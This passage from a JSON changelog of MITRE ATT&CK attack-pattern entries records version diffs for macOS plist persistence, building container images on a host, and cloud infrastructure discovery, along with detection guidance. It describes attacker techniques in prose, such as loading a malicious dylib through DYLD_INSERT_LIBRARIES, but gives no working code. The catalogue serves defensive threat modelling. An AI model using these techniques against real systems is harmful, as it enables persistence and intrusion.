{\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}, \"iterable_item_added\": {\"root['external_references'][15]\": {\"source_name\": \"User Approved Kernel Extension Pike\\u2019s\", \"description\": \"Pikeralpha. (2017, August 29). User Approved Kernel Extension Loading\\u2026. Retrieved September 23, 2021.\", \"url\": \"https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/\"}, \"root['external_references'][16]\": {\"source_name\": \"Purves Kextpocalypse 2\", \"description\": \"Richard Purves. (2017, November 9). MDM and the Kextpocalypse . Retrieved September 23, 2021.\", \"url\": \"https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/\"}, \"root['external_references'][17]\": {\"source_name\": \"Apple Developer Configuration Profile\", \"description\": \"Apple. (2019, May 3). Configuration Profile Reference. Retrieved September 23, 2021.\", \"url\": \"https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf\"}, \"root['x_mitre_data_sources'][0]\": \"File: File Modification\"}}",
"previous_version": "1.1",
"version_change": "1.1 \u2192 1.2",
"changelog_mitigations": {
"shared": [
"M1026: Privileged Account Management",
"M1038: Execution Prevention",
"M1049: Antivirus/Antimalware"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0008: Kernel (Kernel Module Load)",
"DS0017: Command (Command Execution)",
"DS0022: File (File Creation)",
"DS0022: File (File Modification)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-01-24 20:02:59.149000+00:00",
"modified": "2021-10-15 14:46:47.383000+00:00",
"name": "Plist Modification",
"description": "Adversaries can modify property list files (plist files) to execute their code as part of establishing persistence. Plist files are used by macOS applications to store properties and configuration settings for applications and services. Applications use information plist files, Info.plist, to tell the operating system how to handle the application at runtime using structured metadata in the form of keys and values. Plist files are formatted in XML and based on Apple's Core Foundation DTD and can be saved in text or binary format.(Citation: fileinfo plist file description) \n\nAdversaries can modify paths to executed binaries, add command line arguments, and insert key/pair values to plist files in auto-run locations which execute upon user logon or system startup. Through modifying plist files in these locations, adversaries can also execute a malicious dynamic library (dylib) by adding a dictionary containing the DYLD_INSERT_LIBRARIES key combined with a path to a malicious dylib under the EnvironmentVariables key in a plist file. Upon user logon, the plist is called for execution and the malicious dylib is executed within the process space. Persistence can also be achieved by modifying the LSEnvironment key in the application's Info.plist file.(Citation: wardle artofmalware volume1)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1547/011",
"external_id": "T1547.011"
},
{
"source_name": "fileinfo plist file description",
"description": "FileInfo.com team. (2019, November 26). .PLIST File Extension. Retrieved October 12, 2021.",
"url": "https://fileinfo.com/extension/plist"
},
{
"source_name": "wardle artofmalware volume1",
"description": "Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved March 19, 2021.",
"url": "https://taomm.org/vol1/pdfs.html"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Service: Service Creation",
"Command: Command Execution",
"File: File Modification",
"Process: Process Creation"
],
"x_mitre_detection": "Monitor for common command-line editors used to modify plist files located in auto-run locations, such as ~/LaunchAgents, ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm, and an application's Info.plist. \n\nMonitor for plist file modification immediately followed by code execution from ~/Library/Scripts and ~/Library/Preferences. Also, monitor for significant changes to any path pointers in a modified plist.\n\nIdentify new services executed from plist modified in the previous user's session. ",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User",
"Administrator"
],
"x_mitre_platforms": [
"macOS"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-15 14:46:47.383000+00:00\", \"old_value\": \"2021-03-30 00:51:59.629000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries can modify property list files (plist files) to execute their code as part of establishing persistence. Plist files are used by macOS applications to store properties and configuration settings for applications and services. Applications use information plist files, Info.plist, to tell the operating system how to handle the application at runtime using structured metadata in the form of keys and values. Plist files are formatted in XML and based on Apple's Core Foundation DTD and can be saved in text or binary format.(Citation: fileinfo plist file description) \\n\\nAdversaries can modify paths to executed binaries, add command line arguments, and insert key/pair values to plist files in auto-run locations which execute upon user logon or system startup. Through modifying plist files in these locations, adversaries can also execute a malicious dynamic library (dylib) by adding a dictionary containing the DYLD_INSERT_LIBRARIES key combined with a path to a malicious dylib under the EnvironmentVariables key in a plist file. Upon user logon, the plist is called for execution and the malicious dylib is executed within the process space. Persistence can also be achieved by modifying the LSEnvironment key in the application's Info.plist file.(Citation: wardle artofmalware volume1)\", \"old_value\": \"Adversaries may modify plist files to run a program during system boot or user login. Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as /Library/Preferences (which execute with elevated privileges) and ~/Library/Preferences (which execute with a user's privileges). \\n\\nAdversaries can modify plist files to execute their code as part of establishing persistence. plists may also be used to elevate privileges since they may execute in the context of another user.(Citation: Sofacy Komplex Trojan) \\n\\nA specific plist used for execution at login is com.apple.loginitems.plist.(Citation: Methods of Mac Malware Persistence) Applications under this plist run under the logged in user's context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them.(Citation: Adding Login Items) Users have direct control over login items installed using a shared file list which are also visible in System Preferences (Citation: Adding Login Items). Some of these applications can open visible dialogs to the user, but they don\\u2019t all have to since there is an option to \\\"hide\\\" the window. If an adversary can register their own login item or modified an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in (Citation: Malware Persistence on OS X) (Citation: OSX.Dok Malware). The API method SMLoginItemSetEnabled can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1059/002) can do this as well. (Citation: Adding Login Items)\", \"diff\": \"--- \\n+++ \\n@@ -1,5 +1,3 @@\\n-Adversaries may modify plist files to run a program during system boot or user login. Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as /Library/Preferences (which execute with elevated privileges) and ~/Library/Preferences (which execute with a user's privileges). \\n+Adversaries can modify property list files (plist files) to execute their code as part of establishing persistence. Plist files are used by macOS applications to store properties and configuration settings for applications and services. Applications use information plist files, Info.plist, to tell the operating system how to handle the application at runtime using structured metadata in the form of keys and values. Plist files are formatted in XML and based on Apple's Core Foundation DTD and can be saved in text or binary format.(Citation: fileinfo plist file description) \\n \\n-Adversaries can modify plist files to execute their code as part of establishing persistence. plists may also be used to elevate privileges since they may execute in the context of another user.(Citation: Sofacy Komplex Trojan) \\n-\\n-A specific plist used for execution at login is com.apple.loginitems.plist.(Citation: Methods of Mac Malware Persistence) Applications under this plist run under the logged in user's context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them.(Citation: Adding Login Items) Users have direct control over login items installed using a shared file list which are also visible in System Preferences (Citation: Adding Login Items). Some of these applications can open visible dialogs to the user, but they don\\u2019t all have to since there is an option to \\\"hide\\\" the window. If an adversary can register their own login item or modified an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in (Citation: Malware Persistence on OS X) (Citation: OSX.Dok Malware). The API method SMLoginItemSetEnabled can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1059/002) can do this as well. (Citation: Adding Login Items)\\n+Adversaries can modify paths to executed binaries, add command line arguments, and insert key/pair values to plist files in auto-run locations which execute upon user logon or system startup. Through modifying plist files in these locations, adversaries can also execute a malicious dynamic library (dylib) by adding a dictionary containing the DYLD_INSERT_LIBRARIES key combined with a path to a malicious dylib under the EnvironmentVariables key in a plist file. Upon user logon, the plist is called for execution and the malicious dylib is executed within the process space. Persistence can also be achieved by modifying the LSEnvironment key in the application's Info.plist file.(Citation: wardle artofmalware volume1)\"}, \"root['external_references'][1]['source_name']\": {\"new_value\": \"fileinfo plist file description\", \"old_value\": \"Sofacy Komplex Trojan\"}, \"root['external_references'][1]['description']\": {\"new_value\": \"FileInfo.com team. (2019, November 26). .PLIST File Extension. Retrieved October 12, 2021.\", \"old_value\": \"Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.\"}, \"root['external_references'][1]['url']\": {\"new_value\": \"https://fileinfo.com/extension/plist\", \"old_value\": \"https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/\"}, \"root['external_references'][2]['source_name']\": {\"new_value\": \"wardle artofmalware volume1\", \"old_value\": \"Methods of Mac Malware Persistence\"}, \"root['external_references'][2]['description']\": {\"new_value\": \"Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved March 19, 2021.\", \"old_value\": \"Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.\"}, \"root['external_references'][2]['url']\": {\"new_value\": \"https://taomm.org/vol1/pdfs.html\", \"old_value\": \"https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf\"}, \"root['x_mitre_data_sources'][0]\": {\"new_value\": \"Service: Service Creation\", \"old_value\": \"File: File Creation\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Monitor for common command-line editors used to modify plist files located in auto-run locations, such as ~/LaunchAgents, ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm, and an application's Info.plist. \\n\\nMonitor for plist file modification immediately followed by code execution from ~/Library/Scripts and ~/Library/Preferences. Also, monitor for significant changes to any path pointers in a modified plist.\\n\\nIdentify new services executed from plist modified in the previous user's session. \", \"old_value\": \"File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like \\\"Knock Knock\\\" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.\\n\\nAll the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and allowed for known good applications. Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items)\\n\\nMonitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.\", \"diff\": \"--- \\n+++ \\n@@ -1,5 +1,5 @@\\n-File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like \\\"Knock Knock\\\" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.\\n+Monitor for common command-line editors used to modify plist files located in auto-run locations, such as ~/LaunchAgents, ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm, and an application's Info.plist. \\n \\n-All the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and allowed for known good applications. Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items)\\n+Monitor for plist file modification immediately followed by code execution from ~/Library/Scripts and ~/Library/Preferences. Also, monitor for significant changes to any path pointers in a modified plist.\\n \\n-Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.\\n+Identify new services executed from plist modified in the previous user's session. \"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['x_mitre_data_sources'][1]\": \"Command: Command Execution\"}, \"iterable_item_removed\": {\"root['external_references'][3]\": {\"source_name\": \"Adding Login Items\", \"description\": \"Apple. (2016, September 13). Adding Login Items. Retrieved July 11, 2017.\", \"url\": \"https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html\"}, \"root['external_references'][4]\": {\"source_name\": \"Malware Persistence on OS X\", \"description\": \"Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.\", \"url\": \"https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf\"}, \"root['external_references'][5]\": {\"source_name\": \"OSX.Dok Malware\", \"description\": \"Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.\", \"url\": \"https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may modify plist files to run a program during s | t | 1 | Adversaries can modify property list files (plist files) to |
| > | ystem boot or user login. Property list (plist) files contai | > | execute their code as part of establishing persistence. Plis | ||
| > | n all of the information that macOS and OS X uses to configu | > | t files are used by macOS applications to store properties a | ||
| > | re applications and services. These files are UTF-8 encoded | > | nd configuration settings for applications and services. App | ||
| > | and formatted like XML documents via a series of keys surrou | > | lications use information plist files, <code>Info.plist</cod | ||
| > | nded by < >. They detail when programs should execute, file | > | e>, to tell the operating system how to handle the applicati | ||
| > | paths to the executables, program arguments, required OS per | > | on at runtime using structured metadata in the form of keys | ||
| > | missions, and many others. plists are located in certain loc | > | and values. Plist files are formatted in XML and based on Ap | ||
| > | ations depending on their purpose such as <code>/Library/Pre | > | ple's Core Foundation DTD and can be saved in text or binary | ||
| > | ferences</code> (which execute with elevated privileges) and | > | format.(Citation: fileinfo plist file description) Advers | ||
| > | <code>~/Library/Preferences</code> (which execute with a us | > | aries can modify paths to executed binaries, add command lin | ||
| > | er's privileges). Adversaries can modify plist files to ex | > | e arguments, and insert key/pair values to plist files in au | ||
| > | ecute their code as part of establishing persistence. plists | > | to-run locations which execute upon user logon or system sta | ||
| > | may also be used to elevate privileges since they may execu | > | rtup. Through modifying plist files in these locations, adve | ||
| > | te in the context of another user.(Citation: Sofacy Komplex | > | rsaries can also execute a malicious dynamic library (dylib) | ||
| > | Trojan) A specific plist used for execution at login is <c | > | by adding a dictionary containing the <code>DYLD_INSERT_LIB | ||
| > | ode>com.apple.loginitems.plist</code>.(Citation: Methods of | > | RARIES</code> key combined with a path to a malicious dylib | ||
| > | Mac Malware Persistence) Applications under this plist run u | > | under the <code>EnvironmentVariables</code> key in a plist f | ||
| > | nder the logged in user's context, and will be started every | > | ile. Upon user logon, the plist is called for execution and | ||
| > | time the user logs in. Login items installed using the Serv | > | the malicious dylib is executed within the process space. Pe | ||
| > | ice Management Framework are not visible in the System Prefe | > | rsistence can also be achieved by modifying the <code>LSEnvi | ||
| > | rences and can only be removed by the application that creat | > | ronment</code> key in the application's <code>Info.plist</co | ||
| > | ed them.(Citation: Adding Login Items) Users have direct con | > | de> file.(Citation: wardle artofmalware volume1) | ||
| > | trol over login items installed using a shared file list whi | ||||
| > | ch are also visible in System Preferences (Citation: Adding | ||||
| > | Login Items). Some of these applications can open visible di | ||||
| > | alogs to the user, but they don\u2019t all have to since there is | ||||
| > | an option to \"hide\" the window. If an adversary can registe | ||||
| > | r their own login item or modified an existing one, then the | ||||
| > | y can use it to execute their code for a persistence mechani | ||||
| > | sm each time the user logs in (Citation: Malware Persistence | ||||
| > | on OS X) (Citation: OSX.Dok Malware). The API method <code> | ||||
| > | SMLoginItemSetEnabled</code> can be used to set Login Items | ||||
| > | , but scripting languages like [AppleScript](https://attack. | ||||
| > | mitre.org/techniques/T1059/002) can do this as well. (Citati | ||||
| > | on: Adding Login Items) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may use brute force techniques to gain access to | t | 1 | Adversaries may use brute force techniques to gain access to |
| > | accounts when passwords are unknown or when password hashes | > | accounts when passwords are unknown or when password hashes | ||
| > | are obtained. Without knowledge of the password for an acco | > | are obtained. Without knowledge of the password for an acco | ||
| > | unt or set of accounts, an adversary may systematically gues | > | unt or set of accounts, an adversary may systematically gues | ||
| > | s the password using a repetitive or iterative mechanism. Br | > | s the password using a repetitive or iterative mechanism. Br | ||
| > | ute forcing passwords can take place via interaction with a | > | ute forcing passwords can take place via interaction with a | ||
| > | service that will check the validity of those credentials or | > | service that will check the validity of those credentials or | ||
| > | offline against previously acquired credential data, such a | > | offline against previously acquired credential data, such a | ||
| > | s password hashes. | > | s password hashes. Brute forcing credentials may take place | ||
| > | at various points during a breach. For example, adversaries | ||||
| > | may attempt to brute force access to [Valid Accounts](https | ||||
| > | ://attack.mitre.org/techniques/T1078) within a victim enviro | ||||
| > | nment leveraging knowledge gathered from other post-compromi | ||||
| > | se behaviors such as [OS Credential Dumping](https://attack. | ||||
| > | mitre.org/techniques/T1003), [Account Discovery](https://att | ||||
| > | ack.mitre.org/techniques/T1087), or [Password Policy Discove | ||||
| > | ry](https://attack.mitre.org/techniques/T1201). Adversaries | ||||
| > | may also combine brute forcing activity with behaviors such | ||||
| > | as [External Remote Services](https://attack.mitre.org/techn | ||||
| > | iques/T1133) as part of Initial Access. |
build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)\n\nAn adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it\u2019s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. ",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1612",
"external_id": "T1612"
},
{
"source_name": "Docker Build Image",
"description": "Docker. ( null). Docker Engine API v1.41 Reference - Build an Image. Retrieved March 30, 2021.",
"url": "https://docs.docker.com/engine/api/v1.41/#operation/ImageBuild"
},
{
"source_name": "Aqua Build Images on Hosts",
"description": "Assaf Morag. (2020, July 15). Threat Alert: Attackers Building Malicious Images on Your Hosts. Retrieved March 29, 2021.",
"url": "https://blog.aquasec.com/malicious-container-image-docker-container-host"
},
{
"source_name": "Aqua Security Cloud Native Threat Report June 2021",
"description": "Team Nautilus. (2021, June). Attacks in the Wild on the Container Supply Chain and Infrastructure. Retrieved August 26, 2021.",
"url": "https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Assaf Morag, @MoragAssaf, Team Nautilus Aqua Security",
"Roi Kol, @roykol1, Team Nautilus Aqua Security",
"Michael Katchinskiy, @michael64194968, Team Nautilus Aqua Security",
"Vishwas Manral, McAfee"
],
"x_mitre_data_sources": [
"Image: Image Creation",
"Network Traffic: Network Connection Creation",
"Network Traffic: Network Traffic Flow",
"Network Traffic: Network Traffic Content"
],
"x_mitre_detection": "Monitor for unexpected Docker image build requests to the Docker daemon on hosts in the environment. Additionally monitor for subsequent network communication with anomalous IPs that have never been seen before in the environment that indicate the download of malicious code.",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User",
"root"
],
"x_mitre_platforms": [
"Containers"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-08-26 16:45:04.924000+00:00\", \"old_value\": \"2021-04-19 13:39:56.999000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)\\n\\nAn adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it\\u2019s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. \", \"old_value\": \"Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)\\n\\nAn adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it\\u2019s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. \", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)\\n \\n-An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it\\u2019s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. \\n+An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it\\u2019s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. \"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][3]\": {\"source_name\": \"Aqua Security Cloud Native Threat Report June 2021\", \"description\": \"Team Nautilus. (2021, June). Attacks in the Wild on the Container Supply Chain and Infrastructure. Retrieved August 26, 2021.\", \"url\": \"https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may build a container image directly on a host t | t | 1 | Adversaries may build a container image directly on a host t |
| > | o bypass defenses that monitor for the retrieval of maliciou | > | o bypass defenses that monitor for the retrieval of maliciou | ||
| > | s images from a public registry. A remote <code>build</code> | > | s images from a public registry. A remote <code>build</code> | ||
| > | request may be sent to the Docker API that includes a Docke | > | request may be sent to the Docker API that includes a Docke | ||
| > | rfile that pulls a vanilla base image, such as alpine, from | > | rfile that pulls a vanilla base image, such as alpine, from | ||
| > | a public or local registry and then builds a custom image up | > | a public or local registry and then builds a custom image up | ||
| > | on it.(Citation: Docker Build Image) An adversary may take | > | on it.(Citation: Docker Build Image) An adversary may take | ||
| > | advantage of that <code>build</code> API to build a custom i | > | advantage of that <code>build</code> API to build a custom i | ||
| > | mage on the host that includes malware downloaded from their | > | mage on the host that includes malware downloaded from their | ||
| > | C2 server, and then they then may utilize [Deploy Container | > | C2 server, and then they then may utilize [Deploy Container | ||
| > | ](https://attack.mitre.org/techniques/T1610) using that cust | > | ](https://attack.mitre.org/techniques/T1610) using that cust | ||
| > | om image.(Citation: Aqua Build Images on Hosts) If the base | > | om image.(Citation: Aqua Build Images on Hosts)(Citation: Aq | ||
| > | image is pulled from a public registry, defenses will likely | > | ua Security Cloud Native Threat Report June 2021) If the bas | ||
| > | not detect the image as malicious since it\u2019s a vanilla imag | > | e image is pulled from a public registry, defenses will like | ||
| > | e. If the base image already resides in a local registry, th | > | ly not detect the image as malicious since it\u2019s a vanilla im | ||
| > | e pull may be considered even less suspicious since the imag | > | age. If the base image already resides in a local registry, | ||
| > | e is already in the environment. | > | the pull may be considered even less suspicious since the im | ||
| > | age is already in the environment. |
DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket (Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block). \nSimilarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI)\n\nAn adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "discovery"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1580",
"external_id": "T1580"
},
{
"source_name": "Amazon Describe Instance",
"description": "Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020.",
"url": "https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html"
},
{
"source_name": "Amazon Describe Instances API",
"description": "Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.",
"url": "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html"
},
{
"source_name": "AWS Get Public Access Block",
"description": "Amazon Web Services. (n.d.). Retrieved May 28, 2021.",
"url": "https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html"
},
{
"source_name": "Google Compute Instances",
"description": "Google. (n.d.). gcloud compute instances list. Retrieved May 26, 2020.",
"url": "https://cloud.google.com/sdk/gcloud/reference/compute/instances/list"
},
{
"source_name": "Microsoft AZ CLI",
"description": "Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.",
"url": "https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest"
},
{
"source_name": "Expel IO Evil in AWS",
"description": "A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.",
"url": "https://expel.io/blog/finding-evil-in-aws/"
},
{
"source_name": "Mandiant M-Trends 2020",
"description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.",
"url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020"
},
{
"source_name": "AWS Describe DB Instances",
"description": "Amazon Web Services. (n.d.). Retrieved May 28, 2021.",
"url": "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Regina Elwell",
"Isif Ibrahima",
"Praetorian"
],
"x_mitre_data_sources": [
"Instance: Instance Metadata",
"Instance: Instance Enumeration",
"Snapshot: Snapshot Metadata",
"Snapshot: Snapshot Enumeration",
"Cloud Storage: Cloud Storage Metadata",
"Cloud Storage: Cloud Storage Enumeration",
"Volume: Volume Metadata",
"Volume: Volume Enumeration"
],
"x_mitre_detection": "Establish centralized logging for the activity of cloud infrastructure components. Monitor logs for actions that could be taken to gather information about cloud infrastructure, including the use of discovery API calls by new or unexpected users. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"IaaS"
],
"x_mitre_version": "1.2",
